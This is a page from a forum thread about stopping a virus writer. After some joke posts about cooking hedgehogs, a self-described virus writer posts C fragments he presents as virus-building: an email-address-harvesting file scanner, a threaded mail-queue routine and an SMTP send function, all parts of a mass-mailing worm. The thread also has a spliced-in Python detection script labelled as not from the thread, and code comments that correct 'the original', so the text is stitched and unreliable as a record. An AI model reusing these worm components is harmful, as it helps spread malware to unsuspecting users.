Stopping a Virus Writer - Page 7

Thread: Stopping a Virus Writer

  1. #61
    Regal Making Handler
    Join Date
    Jun 2002
    Posts
    1,668
    Can you eat them?
    Yes, smother them with clay and dump them in a fire to bake. After a suitable cook time, remove from the fire. Break open the clay ball. The spines should stay attached to the clay, leaving you with some cooked meat. By the way, there was, a few years back, a hedgehog-flavoured crisp on the market over here. Not real, just a gimmick.
    What happens if a big asteroid hits the Earth? Judging from realistic simulations involving a sledge hammer and a common laboratory frog, we can assume it will be pretty bad. - Dave Barry

  2. #62
    foxyloxley (They call me the Hunted)
    Join Date
    Nov 2003
    Location
    3rd Rock from Sun
    Posts
    2,528
    After a suitable cook time
    You've got to let them stop SQUEALING first
    55 - I'm fiftyfeckinfive and STILL no wiser,
    OLDER yes
    Beware of Geeks bearing GIF's
    come and waste the day :P at The Taz Zone

  3. #63
    TAZ
    Join Date
    Dec 2004
    Posts
    3,171
    Hi DjM,

    A hedgehog is one of those little creatures that rolls up into a ball to baffle his enemies...a spiny ball, kinda like velcro but with pins instead of velcro hooks...

    Hi jinxy,

    First you have to slice open the soft underbelly and remove the guts or the meat will get infected and taste nasty...other than that....Yummmmmmm! Anybody got a toothpick! Do they have recipes on their website too?

    Hi foxyloxley,

    Geeeeezzzz!...that sounds soooooo cruel to cook it while it's still alive....you have to beat it unconscious first with a rock to tenderize it...then cook it! Sheeeeeesh!


    Eg


  4. #64

    Cool

    I'm an older virus writer, and some of my viruses don't actually run, but I don't understand the malicious virus writers who send a virus only to annoy people or to appear in the papers.

    Basically this area is "voodoo" for all coders, and I find it interesting and exciting! Actually I write some dangerous virus code; the difference is that I study it, I'm not interested in being famous.

    Now, some virus propagations cause millions in losses for some enterprises; is that true, or is it only a legend?

    Many AV enterprises treat a virus as good business; it is true, they send a hive (virus egg) and infect millions of PCs around the world, and two days later they release a removal tool. When an independent virus coder sends a hive, then he is persecuted. Ironic? Yes.


    Now, with respect to the original post and Tindala's post, the problem resides in the kernel; the traditional AV doesn't detect this virus. Why? Simple: the code "deltas" at the ring zero kernel level and the AV doesn't see that.

    Some viruses implement their own protocols, like TCP, like SMTP and others.


    Diagnostic:

    - Loss of memory (and virtual memory)
    - Low task processing
    - Malfunction in some kernel objects (system freezes and panics [under Linux])
    - Rare and unlisted port traffic (open ports etc.)
    - "Idiot" or "suck.." ill-intentioned messages on the screen (not from system form objects)
    - Loss of information (encrypted data and corrupt files)
    - Denied root or administrator access (Windows)
    - Denied user access


    Solution:

    In the pack of processes:
    - First: a traffic scanner
    - Second: a memory scanner (background process and registration of high objects), like a spy
    - Third: a commercial AV

    Then, an expert coder who uses these tools and hunts the non-commercial virus.

    Yes, this is only an idea, very difficult, but this works only if you don't decide to reinstall or recompile the binaries for the kernel system, or reinstall the system (data server, web server etc.).


    What is it?

    A difficult way, but the secure way to take off a rare non-commercial virus.



    Saludos
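A defender's counterpart to the "traffic scanner" in the post above and to its point that some viruses carry their own SMTP client: an added example, not from the thread or any poster, that reads a constructed connection log and flags internal hosts that open SMTP connections to several destinations other than the mail relay. The log format, the relay address 10.0.0.2 and the threshold are assumptions.

```python
import re
from collections import defaultdict

SMTP_PORTS = {25, 465, 587}

# Constructed firewall/netflow-style sample (not from the thread):
# "<timestamp> <src_ip> <dst_ip> <dst_port> <proto>"
SAMPLE_LOG = """\
2005-09-10T10:00:01 10.0.0.15 10.0.0.2 25 tcp
2005-09-10T10:00:02 10.0.0.15 10.0.0.2 25 tcp
2005-09-10T10:00:03 10.0.0.42 10.0.0.2 25 tcp
2005-09-10T10:00:05 10.0.0.42 203.0.113.10 25 tcp
2005-09-10T10:00:06 10.0.0.42 198.51.100.7 25 tcp
2005-09-10T10:00:06 10.0.0.42 198.51.100.7 25 tcp
2005-09-10T10:00:07 10.0.0.42 203.0.113.44 587 tcp
2005-09-10T10:00:08 10.0.0.42 192.0.2.9 25 tcp
2005-09-10T10:00:09 10.0.0.99 203.0.113.10 25 tcp
2005-09-10T10:00:10 10.0.0.99 203.0.113.10 80 tcp
"""

# Hosts that are supposed to talk SMTP to the outside (assumed relay address)
MAIL_RELAYS = {"10.0.0.2"}

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<port>\d+) (?P<proto>\w+)$")


def parse_line(line):
    """Return (src, dst, port, proto), or None for a line that does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m["src"], m["dst"], int(m["port"]), m["proto"].lower()


def find_direct_smtp_senders(log_text, relays=MAIL_RELAYS, threshold=3):
    """Map src_ip -> set of non-relay SMTP destinations, keeping only the sources
    that reached at least `threshold` distinct destinations (mass-mailer fan-out)."""
    fanout = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        src, dst, port, proto = rec
        if proto != "tcp" or port not in SMTP_PORTS:
            continue
        if src in relays or dst in relays:
            continue  # legitimate path through the mail relay
        fanout[src].add(dst)
    return {src: dsts for src, dsts in fanout.items() if len(dsts) >= threshold}
```

On the sample, only 10.0.0.42 is reported (four distinct non-relay destinations); lowering the threshold to 1 also surfaces 10.0.0.99.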

  5. #65
    Banned
    Join Date
    Sep 2005
    Posts
    12
    Firewalls and AVs usually work, but if they come out with new ones every day, how do we stop them? Do we merely learn from them, and send their attacks back at them? Merely for defensive purposes, of course. Or do we let them keep attacking poor innocent people? =(

  6. #66
    Senior Member
    Join Date
    Jul 2003
    Posts
    634
    Now, I couldn't be arsed reading the entire 7 pages (sorry, I'm wasted...) of this thread, but I was just wondering why you think he's writing them? Could he not just be using a virus creation kit? AVs will pick these up.

    What does the "virus" do?

    lalalala

    i2c

  7. #67
    Originally posted here by i2c
    Now, I couldn't be arsed reading the entire 7 pages (sorry, I'm wasted...) of this thread, but I was just wondering why you think he's writing them? Could he not just be using a virus creation kit? AVs will pick these up.

    What does the "virus" do?

    i2c
    Yes, good question. I write a creation kit for polymorphic variants, assembler, C++ etc., but the problem with that is:

    A virus writer is a lonely person, an underground person; actually I'm not. I consider myself a newbie in virus writing. I learn day by day. But my point in this question (my question) is to take a lot of my experience in virus creation and virus design to help. I don't say why I decided to take this way; to help people? Anyway, that was in the past; now I learn to take life's "happiness". Suicidal boy? Maybe, but I learned from "coding viruses" that malicious code is the wrong way; only I have the necessary weapons to live the obfuscated coding in peace and better.


    You see, writing virus code is not a difficult task; you only need to know how the operating system works.

    we have a piece of code:

    a simple scanner

    /\
    < >
    \/

    Code:
    #include <windows.h>

    /* The two scan helpers are the author's own and are not shown in the post;
       these prototypes are assumed so that the fragment compiles. */
    void  scantext_textcvt(char *buf, DWORD len);
    DWORD scantext_extract_ats(char *buf, DWORD len);

    /* Read a file in chunks of up to 64 KB and hand each chunk to the scan helpers.
       Returns 0 on success and 1 if the file cannot be opened.
       (Identifiers starting with a double underscore are reserved in C; they are kept
       here only because the post uses them.) */
    int file_parser(const char *filename)
    {
    	HANDLE __file__;                          // handle returned by CreateFile
    	DWORD __offset__, __heap__, __finder__;   // bytes read, bytes seen so far, hits so far
    	char buf[65535];                          // one scan chunk; the author wanted a large buffer

    	/* dwDesiredAccess must be GENERIC_READ (the original passed a share flag there), and
    	   FILE_FLAG_OVERLAPPED is dropped because ReadFile below is called synchronously
    	   with no OVERLAPPED structure, which fails with that flag set. */
    	__file__ = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
    		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    	if (__file__ == INVALID_HANDLE_VALUE) return 1;   // CreateFile never returns NULL
    	// Like hd0 on Linux, \\.\PHYSICALDRIVE0 can be opened the same way
    	__heap__ = 0;
    	__finder__ = 0;
    	for (;;) {
    		__offset__ = 0;                                   // how far the chunk was filled
    		// sizeof(buf)-2 leaves room for the terminating NUL written below
    		if (!ReadFile(__file__, buf, sizeof(buf) - 2, &__offset__, NULL)) break;
    		if (__offset__ == 0 || __offset__ >= sizeof(buf)) break;   // end of file
    		__heap__ += __offset__;
    		buf[__offset__] = 0;

    		scantext_textcvt(buf, __offset__);                // normalise the chunk
    		__finder__ += scantext_extract_ats(buf, __offset__);   // count whatever the scan looks for

    		// Give up on a file with no hits in the first 300 KB: a general patrol, not a specific one.
    		// Look at .EXE and .dll (object) code for a while and you will see why this is a real
    		// patrol for some Windows or Linux objects.
    		if ((__finder__ == 0) && (__heap__ > (300 * 1024)))
    			break;
    	}
    	CloseHandle(__file__);   // close the "stream"
    	return 0;
    }

    If you want to send that in mail packets it is very simple:

    the difficult way:

    The _MAILPROTOCOL_CLS, if you prefer, is a simple dynamic list; it has to be defined before the thread routine that uses it.

    Code:
    #include <windows.h>

    // queue node for mail transfer packets
    #pragma pack(push, 1)
    struct _MAILPROTOCOL_CLS {
    	struct _MAILPROTOCOL_CLS *next;
    	unsigned long tick_got;
    	char _state;     // 1 = being sent, 2 = sent, as set by the thread below
    	char priority;
    	char to[1];      // recipient string, allocated past the end of the struct
    };
    #pragma pack(pop)        // the original never restored the packing

    // The author's sender routine is not shown in the post; prototype assumed
    void mmsender(struct _MAILPROTOCOL_CLS *msg);

    static volatile LONG mythread = 0;   // idle counter for the asynchronous sender (was undeclared)

    // queueing for mail transfer packets: one queued message per thread
    static DWORD WINAPI __doomkicker(LPVOID _flag)
    {
    	struct _MAILPROTOCOL_CLS *_MTQ = (struct _MAILPROTOCOL_CLS *)_flag;
    	InterlockedIncrement(&mythread);   // atomically increments the running-thread counter
    	if (_MTQ != NULL) {
    		_MTQ->_state = 1;
    		mmsender(_MTQ);
    		_MTQ->_state = 2;
    	}
    	// Decrement unconditionally: the original's "if (mythread > 0)" test raced with other
    	// threads, and its ExitThread(0) made the return below unreachable.
    	InterlockedDecrement(&mythread);
    	return 0;   // the thread's exit code
    }

    the easy way:

    prototypes

    Code:
    #include <winsock2.h>   // must come before windows.h
    #include <windows.h>
    #include <stdbool.h>
    #include <stdio.h>
    #include <string.h>
    #include <time.h>

    #define BUFFER_DEFAULT_SIZE 4096

    #define TIME_STAMP_YES 0
    #define TIME_STAMP_NO 1
    #define STR_VALUE 0
    #define DW_VALUE 1
    #define REG_BUFF 100

    structures:

    Code:
    typedef struct
    {
       char* ToAdd;
       char* FromAdd;
       char* Subject;
       char* MsgBody;
    } SmtpMsg;

    typedef struct
    {
       char* address;
       int port;
    } TCPServer;

    static FILE *logFile;

    // Current local time as text; asctime() returns a static buffer, so copy it before the next call
    char* getNowTime (void)
    {
       struct tm *nowTime;
       time_t aclock;

       time (&aclock);
       nowTime = localtime (&aclock);

       return asctime(nowTime);
    }


    //principal module (sender): write one command and read the server's reply into rcvBuff

    Code:
    bool sendData (const char* msg, SOCKET sockInUse, char* rcvBuff)
    {
       int ret;
       size_t msgLength = strlen(msg);

       ZeroMemory (rcvBuff, BUFFER_DEFAULT_SIZE);

       if (send (sockInUse, msg, (int)msgLength, 0) == SOCKET_ERROR) {
          printf ("send failed, WSA error %d\n", WSAGetLastError());
          return false;
       }
       // leave one byte so the reply stays NUL-terminated for the caller
       ret = recv (sockInUse, rcvBuff, BUFFER_DEFAULT_SIZE - 1, 0);
       if (ret == SOCKET_ERROR) {
          // The original did printf("..." + WSAGetLastError()), which adds the error code
          // to the string pointer instead of printing it, and reported "OK" on failure.
          printf ("recv failed, WSA error %d\n", WSAGetLastError());
          return false;
       }
       if (ret == 0)
          return false;   // the server closed the connection

       return true;
    }


    ZeroMemory:

    The ZeroMemory macro fills a block of memory with zeros.

    To avoid undesired effects of optimizing compilers, use the SecureZeroMemory function.


    If you don't know what the ZeroMemory prototype is:

    Code:
    void ZeroMemory(
      PVOID Destination,
      SIZE_T Length
    );

    Parameters
    Destination
    [in] Pointer to the starting address of the block of memory to fill with zeros.
    Length
    [in] Size of the block of memory to fill with zeros, in bytes.
    Return Values
    This function has no return value.

    If you have no idea how send is declared:

    Code:
    int PASCAL FAR send (
                         IN SOCKET s,
                         IN const char FAR * buf,
                         IN int len,
                         IN int flags);

    part of winsock.h

    Now, virus creation needs more coding; this is only the first way, or any way. Really, I am sometimes confused
    about what the better way is to attack virus code (coding). The virus creation tools are the simplest way for
    kids and children; I take a moment to write an asm virus or a C trojan horse, but I repeat:

    Is the virus a better way to learn?

    I say yes; every virus includes an "expertise" knowledge of operating systems and hardware functionality..

    I don't need morality to see malicious coders as child molesters; those children are the future of the real
    underground and professional coders. But these children, like me (a long time ago), need someone who teaches the
    only way: best software, best operating systems (pleasseeee), best games and best persons (machines, any..)


    Saludos i2c and BesT WisheS

    AzRaEL [NuKE]

    /\
    < >
    \/

  8. #68
    Senior Member
    Join Date
    Jul 2003
    Posts
    634
    Yea, interesting post. I understand the process of creation; anyone that mucks about with code and OSs, I believe, has the knowledge to do some damaging things. I just wanted to learn more about this person's problem, as he was very vague on details!

    You seem like the majority of us here at AO, interested in the "black arts" but with too many morals to use them to cause harm...

    Cheers for the post

    i2c
